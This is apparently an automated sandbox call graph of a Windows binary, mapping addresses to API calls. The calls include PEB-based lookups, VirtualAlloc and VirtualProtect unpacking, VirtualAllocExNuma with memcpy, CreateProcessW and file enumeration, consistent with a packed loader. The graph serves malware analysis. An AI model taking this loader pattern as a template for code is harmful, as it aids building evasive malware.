GetPEB 6599->6601 6600->6381 6601->6600 6613 2dc288a 6602->6613 6603 2dc2f00 GetPEB 6605 2dc2a2b FindNextFileW 6603->6605 6604 2dc2a51 6606 2dc2f00 GetPEB 6604->6606 6605->6613 6607 2dc2a66 FindClose 6606->6607 6608 2dc2a4f 6607->6608 6608->6595 6609 2dc2f00 GetPEB 6610 2dc2931 FindFirstFileW 6609->6610 6610->6608 6610->6613 6611 2dc25fd GetPEB RtlAllocateHeap 6611->6613 6612 2dc2f00 GetPEB 6612->6613 6613->6603 6613->6604 6613->6608 6613->6609 6613->6611 6613->6612 6614 2dc2871 2 API calls 6613->6614 6615 2dc2f5e GetPEB 6613->6615 6616 2dc2fb6 2 API calls 6613->6616 6614->6613 6615->6613 6616->6613 6621 2dc1014 6617->6621 6618 2dc1082 6620 2dc2f00 GetPEB 6618->6620 6619 2dc2f00 GetPEB 6619->6621 6622 2dc1080 6620->6622 6621->6618 6621->6619 6621->6622 6623 2dc2fb6 2 API calls 6621->6623 6622->6394 6623->6621 6625 2dc2f34 GetPEB 6624->6625 6626 2dc357d 6625->6626 6627 2dc2f00 GetPEB 6626->6627 6628 2dc35ab CreateProcessW 6627->6628 6629 2dc35b2 6628->6629 6633 2dc35b9 6628->6633 6630 2dc2f00 GetPEB 6629->6630 6629->6633 6631 2dc35dc 6630->6631 6632 2dc2f00 GetPEB 6631->6632 6632->6633 6633->6422 6635 2dc2fb6 2 API calls 6634->6635 6636 2dc26e3 6635->6636 6636->6432 6636->6636 6638 2dc2f00 GetPEB 6637->6638 6640 2dc3bfa 6638->6640 6639 2dc3c48 6639->6436 6640->6639 6641 2dc2f00 GetPEB 6640->6641 6641->6639 6643 2dc2f00 GetPEB 6642->6643 6644 2dc3010 6643->6644 6644->6461 6647 2dc1d54 6645->6647 6646 2dc2f00 GetPEB 6646->6647 6647->6646 6648 2dc1f04 6647->6648 6650 2dc163b 6647->6650 6651 2dc2fb6 2 API calls 6647->6651 6649 2dc2f5e GetPEB 6648->6649 6649->6650 6650->6479 6650->6480 6651->6647 6655 2dc3612 6652->6655 6653 2dc36ef 6654 2dc2f00 GetPEB 6653->6654 6656 2dc36ed 6654->6656 6655->6653 6655->6656 6657 2dc2f00 GetPEB 6655->6657 6656->6487 6657->6655 6661 2dc1b0a 6658->6661 6659 2dc1d2f 6662 2dc1d3a 6659->6662 6663 2dc2f5e GetPEB 6659->6663 6661->6659 6661->6662 6664 2dc2f00 GetPEB 6661->6664 6665 2dc2fb6 2 API calls 6661->6665 6717 2dc2f92 6661->6717 6662->6503 6663->6662 6664->6661 6665->6661 6677 2dc2112 6666->6677 6667 2dc23a9 6669 2dc2f00 GetPEB 6667->6669 6670 2dc23c0 6669->6670 6670->6503 6671 2dc2fb6 2 API calls 6671->6677 6673 2dc2f00 GetPEB 6673->6677 6674 2dc2f5e GetPEB 6674->6677 6675 2dc25fd 2 API calls 6675->6677 6677->6667 6677->6670 6677->6671 6677->6673 6677->6674 6677->6675 6720 2dc20b1 6677->6720 6723 2dc3d20 6677->6723 6730 2dc1fc5 6677->6730 6688 2dc1673 6678->6688 6679 2dc17cf 6681 2dc26b1 2 API calls 6679->6681 6680 2dc3715 GetPEB 6680->6688 6684 2dc17d9 6681->6684 6682 2dc2f92 GetPEB 6682->6688 6683 2dc372b GetPEB 6683->6688 6686 2dc2f00 GetPEB 6684->6686 6685 2dc2fb6 2 API calls 6685->6688 6687 2dc17f7 6686->6687 6689 2dc2f5e GetPEB 6687->6689 6688->6679 6688->6680 6688->6682 6688->6683 6688->6685 6690 2dc26b1 2 API calls 6688->6690 6691 2dc17c4 6688->6691 6692 2dc2f00 GetPEB 6688->6692 6693 2dc2f5e GetPEB 6688->6693 6689->6691 6690->6688 6691->6503 6692->6688 6693->6688 6699 2dc1923 6694->6699 6695 2dc1ad8 6698 2dc1ad6 6695->6698 6701 2dc2f5e GetPEB 6695->6701 6696 2dc2f00 GetPEB 6696->6699 6697 2dc2f92 GetPEB 6697->6699 6698->6503 6699->6695 6699->6696 6699->6697 6699->6698 6700 2dc2fb6 2 API calls 6699->6700 6700->6699 6701->6698 6703 2dc2fb6 2 API calls 6702->6703 6705 2dc4145 6702->6705 6703->6705 6704 2dc4168 6704->6503 6705->6704 6706 2dc2f5e GetPEB 6705->6706 6706->6704 6709 2dc3795 6707->6709 6708 2dc37ef 6708->6503 6709->6708 6738 2dc3715 6709->6738 6713 2dc1868 6711->6713 6712 2dc18f4 6712->6503 6713->6712 6714 2dc2fb6 2 API calls 6713->6714 6715 2dc18f6 6713->6715 6714->6713 6741 2dc3855 6715->6741 6718 2dc2f00 GetPEB 6717->6718 6719 2dc2fae 6718->6719 6719->6661 6721 2dc2f00 GetPEB 6720->6721 6722 2dc20e0 6721->6722 6722->6677 6726 2dc3d33 6723->6726 6724 2dc2f00 GetPEB 6724->6726 6725 2dc3da8 6727 2dc2f00 GetPEB 6725->6727 6726->6724 6726->6725 6728 2dc3da6 6726->6728 6729 2dc2fb6 2 API calls 6726->6729 6727->6728 6728->6677 6729->6726 6737 2dc1fdb 6730->6737 6731 2dc20b1 GetPEB 6731->6737 6732 2dc209d 6733 2dc20a8 6732->6733 6735 2dc2f5e GetPEB 6732->6735 6733->6677 6734 2dc2f00 GetPEB 6734->6737 6735->6733 6736 2dc2fb6 2 API calls 6736->6737 6737->6731 6737->6732 6737->6734 6737->6736 6739 2dc2f00 GetPEB 6738->6739 6740 2dc3727 6739->6740 6740->6709 6742 2dc2f92 GetPEB 6741->6742 6743 2dc3874 6742->6743 6743->6712 6748 2dc6e0f 6744->6748 6745 2dc2fb6 2 API calls 6745->6748 6746 2dc706c 6746->6511 6747 2dc706e 6750 2dc2f5e GetPEB 6747->6750 6748->6745 6748->6746 6748->6747 6752 2dc25fd 2 API calls 6748->6752 6753 2dc3564 2 API calls 6748->6753 6755 2dc2f5e GetPEB 6748->6755 6756 2dc2f00 GetPEB 6748->6756 6786 2dc74d0 6748->6786 6794 2dc10b2 6748->6794 6801 2dc790a 6748->6801 6750->6746 6752->6748 6753->6748 6755->6748 6756->6748 6763 2dc7091 6757->6763 6758 2dc2ff4 GetPEB 6758->6763 6759 2dc2fb6 2 API calls 6759->6763 6760 2dc71b6 6761 2dc2f5e GetPEB 6760->6761 6762 2dc71a1 6761->6762 6762->6511 6763->6758 6763->6759 6763->6760 6763->6762 6764 2dc2f00 GetPEB 6763->6764 6807 2dc3014 6763->6807 6764->6763 6776 2dc71e5 6766->6776 6767 2dc7222 6767->6511 6769 2dc3564 2 API calls 6769->6776 6770 2dc74d0 2 API calls 6770->6776 6771 2dc721b 6775 2dc2f5e GetPEB 6771->6775 6773 2dc2fb6 2 API calls 6773->6776 6774 2dc2f00 GetPEB 6774->6776 6775->6767 6776->6767 6776->6769 6776->6770 6776->6771 6776->6773 6776->6774 6777 2dc32db GetPEB 6776->6777 6823 2dc336b 6776->6823 6829 2dc3465 6776->6829 6777->6776 6785 2dc741d 6778->6785 6779 2dc74d0 2 API calls 6779->6785 6780 2dc3564 2 API calls 6780->6785 6781 2dc74c2 6782 2dc2f5e GetPEB 6781->6782 6784 2dc7444 6782->6784 6783 2dc2fb6 2 API calls 6783->6785 6784->6511 6785->6779 6785->6780 6785->6781 6785->6783 6785->6784 6791 2dc74ec 6786->6791 6787 2dc7698 6788 2dc2f00 GetPEB 6787->6788 6790 2dc7696 6788->6790 6789 2dc25fd 2 API calls 6789->6791 6790->6748 6791->6787 6791->6789 6791->6790 6792 2dc2f00 GetPEB 6791->6792 6793 2dc2f5e GetPEB 6791->6793 6792->6791 6793->6791 6795 2dc10c4 6794->6795 6796 2dc1139 6795->6796 6797 2dc2f00 GetPEB 6795->6797 6799 2dc2fb6 2 API calls 6795->6799 6800 2dc1137 6795->6800 6798 2dc2f00 GetPEB 6796->6798 6797->6795 6798->6800 6799->6795 6800->6748 6803 2dc791f 6801->6803 6802 2dc7958 6802->6748 6803->6802 6804 2dc794d 6803->6804 6805 2dc2fb6 2 API calls 6803->6805 6806 2dc3855 GetPEB 6804->6806 6805->6803 6806->6802 6808 2dc3025 6807->6808 6809 2dc2f00 GetPEB 6808->6809 6811 2dc30fb 6808->6811 6810 2dc3050 6809->6810 6810->6811 6812 2dc2f92 GetPEB 6810->6812 6811->6763 6815 2dc3080 6812->6815 6813 2dc30c6 6819 2dc3136 6813->6819 6814 2dc2f92 GetPEB 6814->6815 6815->6813 6815->6814 6818 2dc2f00 GetPEB 6818->6811 6820 2dc30db 6819->6820 6822 2dc314e 6819->6822 6820->6811 6820->6818 6821 2dc2f00 GetPEB 6821->6822 6822->6820 6822->6821 6827 2dc337b 6823->6827 6824 2dc2f00 GetPEB 6824->6827 6825 2dc3443 6828 2dc2f00 GetPEB 6825->6828 6826 2dc3441 6826->6776 6827->6824 6827->6825 6827->6826 6828->6826 6830 2dc347c 6829->6830 6831 2dc2f34 GetPEB 6830->6831 6832 2dc34a0 6830->6832 6834 2dc25fd 2 API calls 6830->6834 6835 2dc34b7 6830->6835 6836 2dc2f00 GetPEB 6830->6836 6837 2dc2f5e GetPEB 6830->6837 6831->6830 6833 2dc2f00 GetPEB 6832->6833 6833->6835 6834->6830 6835->6776 6836->6830 6837->6830 6839 2dc2f00 GetPEB 6838->6839 6840 2dc3295 6839->6840 6841 2dc32cf 6840->6841 6842 2dc2f00 GetPEB 6840->6842 6841->6529 6843 2dc32b8 6842->6843 6844 2dc2f00 GetPEB 6843->6844 6844->6841 6846 2dc35fa GetPEB 6845->6846 6847 2dc332f 6846->6847 6847->6529 6849 2dc5399 6848->6849 6850 2dc25fd 2 API calls 6849->6850 6851 2dc2f00 GetPEB 6849->6851 6852 2dc53c9 6849->6852 6853 2dc53dd 6849->6853 6855 2dc2f5e GetPEB 6849->6855 6850->6849 6851->6849 6854 2dc2f00 GetPEB 6852->6854 6853->6541 6854->6853 6855->6849 6857 2dc2e52 6856->6857 6857->6344 6859 2dc2e09 6858->6859 6860 2dc2de6 6858->6860 6859->6341 6860->6859 6862 2dc2e74 6860->6862 6863 2dc2e89 6862->6863 6864 2dc2f00 GetPEB 6863->6864 6865 2dc2eb7 6864->6865 6866 2dc2edb 6865->6866 6867 2dc2f00 GetPEB 6865->6867 6868 2dc2da8 GetPEB 6866->6868 6869 2dc2efa 6866->6869 6867->6866 6868->6869 6869->6859 7647 2db2c75 7648 2db283f GetPEB 7647->7648 7649 2db2c8c 7648->7649 7650 2dc5872 7651 2dc25fd 2 API calls 7650->7651 7652 2dc5886 7651->7652 7653 2dc2f00 GetPEB 7652->7653 7654 2dc58b0 7653->7654 7655 2dc2f5e GetPEB 7654->7655 7656 2dc58bd 7655->7656 7657 2dc2f00 GetPEB 7656->7657 7658 2dc58d5 7657->7658 7659 2db3a6b 7660 2db3a6e 7659->7660 7661 2db28f5 GetPEB 7660->7661 7663 2db3a84 7661->7663 7662 2db3aa7 7663->7662 7664 2db289d GetPEB 7663->7664 7664->7662 7668 2db6168 7669 2db283f GetPEB 7668->7669 7670 2db618b 7669->7670 7673 2db1d2a 7670->7673 7674 2db1d3f 7673->7674 7675 2db21b0 GetPEB 7674->7675 7676 2db1d54 7674->7676 7675->7676 7677 2db706e 7678 2db7081 7677->7678 7679 2db70b6 7678->7679 7680 2db3d9e GetPEB 7678->7680 7681 2db708d 7680->7681 7682 2db1eb6 GetPEB 7681->7682 7683 2db70a0 7682->7683 7684 2db289d GetPEB 7683->7684 7684->7679 7685 2db3a6c 7686 2db28f5 GetPEB 7685->7686 7688 2db3a84 7685->7688 7686->7688 7687 2db3aa7 7688->7687 7689 2db289d GetPEB 7688->7689 7689->7687 7696 c12a7f 7698 c12a8d __set_app_type _encode_pointer __p__fmode __p__commode 7696->7698 7699 c12b2c _pre_c_init __RTC_Initialize 7698->7699 7700 c12b46 7699->7700 7701 c12b3a __setusermatherr 7699->7701 7706 c12fca _controlfp_s 7700->7706 7701->7700 7704 c12b54 _configthreadlocale 7705 c12b5d 7704->7705 7707 c12b4b 7706->7707 7708 c12fe6 _invoke_watson 7706->7708 7707->7704 7707->7705 7708->7707 6987 c132fe 6988 c11d28 3 API calls 6987->6988 6989 c13307 6988->6989 6990 2dc5799 6996 2dc579c 6990->6996 6991 2dc25fd 2 API calls 6991->6996 6992 2dc5854 6993 2dc2871 5 API calls 6992->6993 6995 2dc5852 6993->6995 6994 2dc2f00 GetPEB 6994->6996 6996->6991 6996->6992 6996->6994 6996->6995 6997 2dc2f5e GetPEB 6996->6997 6997->6996 7006 2db0f92 7020 2db0fb2 7006->7020 7007 2db110e 7010 2db1ff0 GetPEB 7007->7010 7008 2db3054 GetPEB 7008->7020 7009 2db1103 7013 2db1118 7010->7013 7012 2db306a GetPEB 7012->7020 7014 2db283f GetPEB 7013->7014 7016 2db1136 7014->7016 7015 2db28f5 GetPEB 7015->7020 7017 2db289d GetPEB 7016->7017 7017->7009 7019 2db283f GetPEB 7019->7020 7020->7007 7020->7008 7020->7009 7020->7012 7020->7015 7020->7019 7021 2db289d GetPEB 7020->7021 7022 2db28d1 7020->7022 7025 2db1ff0 7020->7025 7021->7020 7023 2db283f GetPEB 7022->7023 7024 2db28ed 7023->7024 7024->7020 7026 2db28f5 GetPEB 7025->7026 7027 2db2022 7026->7027 7027->7020 7027->7027 7028 2db1192 7031 2db11a7 7028->7031 7029 2db28f5 GetPEB 7029->7031 7030 2db1233 7031->7029 7031->7030 7032 2db1235 7031->7032 7034 2db3194 7032->7034 7035 2db28d1 GetPEB 7034->7035 7036 2db31b3 7035->7036 7036->7030 7037 2db2895 7040 2db2873 7037->7040 7041 2db283f GetPEB 7040->7041 7042 2db288d 7041->7042 7043 c1338e ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 7044 c12c93 7045 c12cb7 ?terminate@ 7044->7045 7046 c12cac 7044->7046 7047 c12cbf __onexit 7045->7047 7716 2dc470f 7717 2dc2f00 GetPEB 7716->7717 7719 2dc4729 7717->7719 7718 2dc4791 7719->7718 7720 2dc2fb6 2 API calls 7719->7720 7721 2dc4770 7720->7721 7721->7718 7722 2dc2f00 GetPEB 7721->7722 7722->7718 7048 2dc7786 7049 2dc7789 7048->7049 7050 2dc2fb6 2 API calls 7049->7050 7051 2dc77fb 7049->7051 7050->7049 6276 2db0000 6278 2db0005 6276->6278 6281 2db002d 6278->6281 6280 2db0029 6299 2db0467 GetPEB 6281->6299 6284 2db0467 GetPEB 6285 2db0053 6284->6285 6286 2db0467 GetPEB 6285->6286 6287 2db0061 6286->6287 6288 2db0467 GetPEB 6287->6288 6289 2db006d 6288->6289 6290 2db0467 GetPEB 6289->6290 6291 2db007b 6290->6291 6292 2db0467 GetPEB 6291->6292 6295 2db0089 6292->6295 6293 2db00e6 GetNativeSystemInfo 6294 2db0109 VirtualAlloc 6293->6294 6298 2db00a0 6293->6298 6297 2db0135 6294->6297 6295->6293 6295->6298 6296 2db0384 VirtualProtect 6296->6297 6296->6298 6297->6296 6297->6298 6298->6280 6298->6298 6300 2db0045 6299->6300 6300->6284 7723 c12a1a _XcptFilter 7055 c12d9d _except_handler4_common 7724 2db1904 7731 2db191a 7724->7731 7726 2db19dc 7727 2db19e7 7726->7727 7729 2db289d GetPEB 7726->7729 7728 2db283f GetPEB 7728->7731 7729->7727 7730 2db28f5 GetPEB 7730->7731 7731->7726 7731->7728 7731->7730 7732 2db19f0 7731->7732 7733 2db283f GetPEB 7732->7733 7734 2db1a1f 7733->7734 7734->7731 6139 c128a1 6159 c12d44 6139->6159 6141 c128ad GetStartupInfoW 6142 c128de InterlockedCompareExchange 6141->6142 6143 c128ef 6142->6143 6144 c128eb 6142->6144 6146 c12910 _amsg_exit 6143->6146 6147 c1291a 6143->6147 6144->6143 6145 c128f7 Sleep 6144->6145 6145->6142 6148 c12943 6146->6148 6147->6148 6149 c12923 _initterm_e 6147->6149 6150 c12952 _initterm 6148->6150 6151 c1296d 6148->6151 6149->6148 6153 c1293e __onexit 6149->6153 6150->6151 6152 c12972 InterlockedExchange 6151->6152 6155 c1297a __IsNonwritableInCurrentImage 6151->6155 6152->6155 6155->6153 6156 c12a4a 6155->6156 6157 c129fe exit 6155->6157 6160 c121fd LoadLibraryExA 6155->6160 6156->6153 6158 c12a52 _cexit 6156->6158 6157->6155 6158->6153 6159->6141 6161 c12241 _time64 srand rand 6160->6161 6162 c12230 6160->6162 6161->6162 6162->6161 6163 c12269 6162->6163 6185 c11ff2 GetPEB 6163->6185 6165 c1227c 6168 c122e9 atoi 6165->6168 6184 c122d1 6165->6184 6167 c123c0 6167->6155 6169 c12305 VirtualAllocExNuma 6168->6169 6170 c1230f memcpy 6169->6170 6169->6184 6189 c120cd 6170->6189 6175 c12352 6194 c12435 CreateWindowExW 6175->6194 6178 c12365 LoadAcceleratorsW 6179 c1239e GetMessageW 6178->6179 6180 c12378 TranslateAcceleratorW 6179->6180 6181 c123ab 6179->6181 6180->6179 6182 c1238a TranslateMessage DispatchMessageW 6180->6182 6199 c111ba 6181->6199 6182->6179 6211 c1272c 6184->6211 6186 c1200c _wcslwr 6185->6186 6188 c1201e 6186->6188 6187 c1203b 6187->6165 6188->6186 6188->6187 6190 c120f8 6189->6190 6190->6190 6191 c1272c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 7 API calls 6190->6191 6192 c121f5 LoadStringW LoadStringW 6191->6192 6193 c123c4 LoadIconW LoadCursorW LoadIconW RegisterClassExW 6192->6193 6193->6175 6195 c12471 GetClientRect 6194->6195 6196 c1235c 6194->6196 6217 c11129 8 API calls 6195->6217 6196->6178 6196->6184 6255 c11c1e 6199->6255 6202 c11c1e ??3@YAXPAX 6203 c111cf 6 API calls 6202->6203 6204 c1122b 6203->6204 6205 c11242 6204->6205 6206 c11234 DeleteDC 6204->6206 6207 c11252 DeleteObject 6205->6207 6208 c1125c 6205->6208 6206->6205 6207->6208 6209 c11265 DeleteObject 6208->6209 6210 c1126f 6208->6210 6209->6210 6210->6184 6212 c12734 6211->6212 6213 c12736 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 6211->6213 6212->6167 6215 c12c54 _crt_debugger_hook 6213->6215 6216 c12c5c GetCurrentProcess TerminateProcess 6213->6216 6215->6216 6216->6167 6222 c11741 6217->6222 6220 c11741 11 API calls 6221 c111b2 ShowWindow UpdateWindow 6220->6221 6221->6196 6223 c1174c 6222->6223 6226 c111a2 6223->6226 6227 c11772 rand 6223->6227 6237 c11c50 6223->6237 6226->6220 6228 c11798 6227->6228 6229 c1179e rand 6227->6229 6228->6229 6230 c117b6 rand 6229->6230 6232 c117f2 6230->6232 6233 c117f8 rand rand 6230->6233 6232->6233 6234 c11842 6233->6234 6235 c1182c 6233->6235 6234->6223 6235->6234 6236 c11838 GetStockObject 6235->6236 6236->6234 6242 c11d70 ??2@YAPAXI 6237->6242 6241 c11c74 6241->6223 6243 c11c66 6242->6243 6244 c11da6 6243->6244 6245 c11db2 __EH_prolog3 6244->6245 6246 c11dc0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 6245->6246 6249 c11ded 6245->6249 6250 c11083 6246->6250 6248 c11ddf _CxxThrowException 6248->6249 6249->6241 6254 c130b8 6250->6254 6252 c1108f ??0exception@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 6253 c110bd 6252->6253 6253->6248 6254->6252 6256 c11c34 6255->6256 6257 c111c5 6255->6257 6258 c11c35 ??3@YAXPAX 6256->6258 6257->6202 6258->6257 6258->6258 7736 c11e25 7737 c11e34 ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7736->7737 7738 c11e3c 7736->7738 7737->7738 7739 2db4e3d 7740 2db4e40 7739->7740 7740->7740 7741 2db283f GetPEB 7740->7741 7742 2db4e55 7741->7742 7056 2db30bc 7057 2db30d4 7056->7057 7058 2db312e 7057->7058 7060 2db3054 7057->7060 7061 2db283f GetPEB 7060->7061 7062 2db3066 7061->7062 7062->7057 7063 c124a9 7064 c124d3 7063->7064 7065 c125c6 7063->7065 7066 c125a1 7064->7066 7067 c124d9 7064->7067 7068 c125d3 7065->7068 7069 c126af 7065->7069 7072 c12551 7066->7072 7127 c11340 7066->7127 7070 c124e2 7067->7070 7071 c1258c SetTimer 7067->7071 7073 c12679 SetCapture 7068->7073 7074 c125da 7068->7074 7069->7072 7141 c112e2 GetClientRect 7069->7141 7075 c124e9 7070->7075 7076 c1257f PostQuitMessage 7070->7076 7071->7072 7080 c1272c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 7 API calls 7072->7080 7073->7072 7077 c125e1 7074->7077 7078 c1266a ReleaseCapture 7074->7078 7081 c124f2 7075->7081 7082 c125e8 7075->7082 7076->7072 7084 c125e5 7077->7084 7085 c1265a SetCapture 7077->7085 7078->7072 7087 c126ef 7080->7087 7088 c124f7 7081->7088 7089 c12559 BeginPaint 7081->7089 7092 c12513 DefWindowProcW 7082->7092 7134 c1122b 7082->7134 7084->7082 7090 c125fe 7084->7090 7085->7072 7088->7072 7088->7092 7098 c12510 7088->7098 7099 c12536 DialogBoxParamW 7088->7099 7102 c113af 7089->7102 7090->7072 7093 c12607 GetClientRect PtInRect 7090->7093 7092->7072 7093->7072 7096 c1262f ReleaseCapture 7093->7096 7094 c1256c EndPaint 7094->7072 7096->7072 7097 c12643 7096->7097 7100 c1122b 3 API calls 7097->7100 7098->7092 7101 c1252a DestroyWindow 7098->7101 7099->7072 7100->7072 7101->7072 7144 c130b8 7102->7144 7104 c113be GetClientRect 7105 c11414 7104->7105 7106 c11467 9 API calls 7105->7106 7145 c11271 7105->7145 7148 c1186a SaveDC SelectClipRgn 7106->7148 7110 c1152c 7111 c1186a 11 API calls 7110->7111 7112 c11558 RestoreDC DeleteObject DeleteObject 7111->7112 7159 c119a1 CreateCompatibleDC 7112->7159 7114 c11583 7164 c116a2 GetTickCount64 7114->7164 7118 c1160c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@N 7119 c11ead 9 API calls 7118->7119 7120 c1161d ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2 7119->7120 7121 c11638 DrawTextA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 7120->7121 7123 c1168c ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 7121->7123 7125 c11661 7121->7125 7124 c116a1 7123->7124 7124->7094 7126 c1167c BitBlt 7125->7126 7126->7123 7128 c1139f InvalidateRect 7127->7128 7129 c1135f 7127->7129 7128->7072 7130 c11c1e ??3@YAXPAX 7129->7130 7131 c1136e GetClientRect 7130->7131 7132 c11741 11 API calls 7131->7132 7133 c1138e 7132->7133 7133->7128 7135 c11242 7134->7135 7136 c11234 DeleteDC 7134->7136 7137 c11252 DeleteObject 7135->7137 7138 c1125c 7135->7138 7136->7135 7137->7138 7139 c11265 DeleteObject 7138->7139 7140 c1126f 7138->7140 7139->7140 7140->7092 7200 c13176 7141->7200 7144->7104 7146 c112e0 7145->7146 7147 c11280 6 API calls 7145->7147 7146->7106 7147->7146 7149 c1189d 7148->7149 7150 c118a9 _invalid_parameter_noinfo 7149->7150 7151 c11990 RestoreDC 7149->7151 7155 c11df8 _invalid_parameter_noinfo _invalid_parameter_noinfo 7149->7155 7156 c11979 Rectangle 7149->7156 7157 c11924 Ellipse 7149->7157 7179 c11df8 7149->7179 7184 c11c99 7149->7184 7150->7149 7151->7110 7154 c11df8 2 API calls 7154->7149 7155->7149 7156->7149 7157->7149 7160 c119cd 7159->7160 7161 c119dc SelectObject AlphaBlend DeleteDC 7159->7161 7189 c11a1f OffsetRect 7160->7189 7161->7114 7165 c1158a SetBkMode DrawTextA ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H 7164->7165 7166 c11ead 7165->7166 7167 c11eb9 __EH_prolog3_catch 7166->7167 7194 c11cca 7167->7194 7170 c11f48 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHPBDH 7173 c11fa2 7170->7173 7174 c11efa ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 7170->7174 7171 c11f3e 7171->7170 7171->7174 7172 c11f1e ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 7172->7171 7177 c11ef0 7172->7177 7173->7174 7176 c11fa6 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 7173->7176 7175 c11d28 3 API calls 7174->7175 7178 c11f94 7175->7178 7176->7173 7176->7174 7177->7170 7177->7171 7177->7172 7177->7174 7178->7118 7180 c11e05 _invalid_parameter_noinfo 7179->7180 7181 c11e0d 7179->7181 7180->7181 7182 c11e1b _invalid_parameter_noinfo 7181->7182 7183 c118c0 SelectObject 7181->7183 7182->7183 7183->7154 7185 c11ca6 _invalid_parameter_noinfo 7184->7185 7186 c11cae 7184->7186 7185->7186 7187 c11cbc _invalid_parameter_noinfo 7186->7187 7188 c11cbe 7186->7188 7187->7188 7188->7149 7190 c11b09 7189->7190 7190->7190 7191 c11b6a 6 API calls 7190->7191 7192 c1272c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 7 API calls 7191->7192 7193 c119da 7192->7193 7193->7161 7195 c11cd6 __EH_prolog3 7194->7195 7196 c11ce8 ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 7195->7196 7197 c11cee 7195->7197 7196->7197 7198 c11d0e 7197->7198 7199 c11d06 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12 7197->7199 7198->7177 7199->7198 7201 c1130e InvalidateRect 7200->7201 7201->7072 7202 2db51b1 7203 2db1f3c GetPEB 7202->7203 7204 2db51c5 7203->7204 7205 2db283f GetPEB 7204->7205 7206 2db51ef 7205->7206 7207 2db289d GetPEB 7206->7207 7208 2db51fc 7207->7208 7209 2db283f GetPEB 7208->7209 7210 2db5214 7209->7210 7211 2db3ab0 7216 2db4108 7211->7216 7213 2db3ab5 7214 2db283f GetPEB 7213->7214 7215 2db3acb 7214->7215 7247 2db4124 7216->7247 7220 2db488d 7387 2db59c9 7220->7387 7229 2db4894 7394 2db5568 7229->7394 7230 2db488b 7230->7213 7238 2db289d GetPEB 7238->7247 7246 2db283f GetPEB 7246->7247 7247->7220 7247->7229 7247->7230 7247->7238 7247->7246 7248 2db58c0 7247->7248 7256 2db56f7 7247->7256 7264 2db665d 7247->7264 7267 2db53ce 7247->7267 7271 2db5549 7247->7271 7274 2db5fd5 7247->7274 7282 2db3d9e 7247->7282 7294 2db3411 7247->7294 7298 2db49de 7247->7298 7301 2db4aaf 7247->7301 7306 2db65b4 7247->7306 7313 2db5d56 7247->7313 7321 2db6ff8 7247->7321 7327 2db5a85 7247->7327 7333 2db1eb6 7247->7333 7336 2db0f3d 7247->7336 7344 2db3e8e 7247->7344 7351 2db70c6 7247->7351 7355 2db5221 7247->7355 7363 2db2c1a 7247->7363 7368 2db7180 7247->7368 7373 2db5beb 7247->7373 7381 2db5efb 7247->7381 7251 2db58d8 7248->7251 7250 2db283f GetPEB 7250->7251 7251->7250 7252 2db1f3c GetPEB 7251->7252 7253 2db59c0 7251->7253 7255 2db289d GetPEB 7251->7255 7407 2db20f1 7251->7407 7420 2db208b 7251->7420 7252->7251 7253->7247 7255->7251 7263 2db5712 7256->7263 7257 2db283f GetPEB 7257->7263 7258 2db58a1 7261 2db283f GetPEB 7258->7261 7259 2db58b3 7259->7247 7260 2db1f3c GetPEB 7260->7263 7261->7259 7262 2db289d GetPEB 7262->7263 7263->7257 7263->7258 7263->7259 7263->7260 7263->7262 7265 2db283f GetPEB 7264->7265 7266 2db6677 7265->7266 7266->7247 7270 2db53e4 7267->7270 7268 2db5504 7268->7247 7269 2db283f GetPEB 7269->7270 7270->7268 7270->7269 7272 2db283f GetPEB 7271->7272 7273 2db5564 7272->7273 7273->7247 7280 2db5fed 7274->7280 7275 2db60f6 7276 2db20f1 GetPEB 7275->7276 7277 2db60f4 7276->7277 7277->7247 7278 2db1f3c GetPEB 7278->7280 7279 2db283f GetPEB 7279->7280 7280->7275 7280->7277 7280->7278 7280->7279 7281 2db289d GetPEB 7280->7281 7281->7280 7289 2db3dbc 7282->7289 7283 2db283f GetPEB 7283->7289 7284 2db3e43 7285 2db1ff0 GetPEB 7284->7285 7287 2db3e4d 7285->7287 7286 2db3e41 7286->7247 7429 2db350a 7287->7429 7289->7283 7289->7284 7289->7286 7291 2db283f GetPEB 7292 2db3e71 7291->7292 7293 2db289d GetPEB 7292->7293 7293->7286 7296 2db342e 7294->7296 7295 2db34f9 7295->7247 7296->7295 7297 2db283f GetPEB 7296->7297 7297->7296 7299 2db28f5 GetPEB 7298->7299 7300 2db49e6 7299->7300 7300->7247 7303 2db4ac1 7301->7303 7302 2db4c14 7302->7247 7303->7302 7304 2db3194 GetPEB 7303->7304 7305 2db28f5 GetPEB 7303->7305 7304->7303 7305->7303 7308 2db65ce 7306->7308 7307 2db6628 7310 2db283f GetPEB 7307->7310 7308->7307 7309 2db28f5 GetPEB 7308->7309 7311 2db6626 7308->7311 7312 2db283f GetPEB 7308->7312 7309->7308 7310->7311 7311->7247 7312->7308 7316 2db5d6e 7313->7316 7314 2db289d GetPEB 7314->7316 7315 2db283f GetPEB 7315->7316 7316->7314 7316->7315 7318 2db5dc0 7316->7318 